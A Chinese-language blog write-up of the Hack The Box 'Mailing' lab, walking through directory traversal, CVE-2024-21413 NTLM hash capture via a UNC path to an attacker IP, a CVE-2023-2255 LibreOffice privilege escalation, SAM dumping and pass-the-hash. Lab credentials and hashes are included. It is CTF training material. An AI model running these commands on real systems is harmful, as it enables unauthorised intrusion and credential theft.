HTB-Mailing
|
544
|
0
|
|
渗透测试

699 字
|
4 分钟

Box Info

OSWindows
DifficultyEasy

Basic Scan

Nmap

nmap -A -O -Pn mailing.htb

开放端口:2580110135139143445465587993

Server:hMailServer

Dirsearch

dirsearch -u mailing.htb -t 50

进入http://mailing.htb

点击Download,就是/download.php

Directory Traversal

进行抓包,发现可以下载文件

尝试修改file参数,成功得到hosts文件

目前这个php文件至少能够读取文件

由于刚才Nmap ,扫描出来邮件服务是hMailServer

经过搜索以及ChatGPT,获取到路径为:C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

MD5解密后获得明文:homenetworkingadministrator

回到之前的instruction.pdf,在ending那里,发送第一封邮件之后,Maya会读取我们的邮件

通过pop3端口连接邮箱,不过里面什么都没有

CVE-2024-21413

Github:

先打开监听器

responder -I tun0 -v

运行poc

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.8\PoC' --subject "Hello world"

在监听器处收到hash,尝试解密

得到maya的密码:m4y4ngs4ri

由于ssh端口没有开,不过可以测试winrm的端口5985

Evil Winrm

evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'

成功进入。

在桌面拿到user.txt

Privilege Escalation

Program Files 文件夹下发现一个LibreOffice

将其License文件下载下来看

readme中发现版本信息

CVE-2023-2255

Github:elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre Office (github.com)

发现C盘下面的Important Document文件夹具有特殊权限

管理员和系统账户对目录有完全控制权限。Maya用户和已认证用户对目录具有修改权限。

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

直接把maya加到管理员组里面去

稍等一会

使用crackmapexec来获取localadmin的哈希值

crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam

最后使用impacket-wmiexec传入hash值登录

impacket-wmiexec localadmin@mailing.htb -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"

Summary

CVE-2024-21413获取hash原理:在邮件的 --url 参数中指定了一个 UNC 路径(\\10.10.16.8\PoC)。UNC 路径通常用于网络共享,当目标系统处理这个路径时,它会尝试与指定的服务器(10.10.16.8)建立连接。

在 Windows 系统中,当系统尝试访问 UNC 路径时,它可能会自动尝试进行身份验证。这个身份验证过程中,Windows 会发送 NTLMv2 哈希来验证用户身份。如果 responder 正在监听这个网络请求,它可以捕获这些哈希值。

如果这些哈希值能够被破解,那么就能够登录相应的服务或者系统。

NTLM 哈希认证机制的特性:NTLM 认证通常与 SMB协议配合使用,通常会使用 TCP 445 端口进行通信。NTLM 认证的机制允许通过密码的哈希值进行身份验证,impacket-wmiexec使用 NT 哈希(通过 Pass-the-Hash 技术)来模拟用户身份,从而无需输入密码就能执行远程命令。

windows的题目还是接触太少了😥

Hacktheboxwindows
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
密码保护:EP-WinServerCA

							
							

							
密码保护:EP-Win8098

							
							

							
密码保护:EP-WinServerDC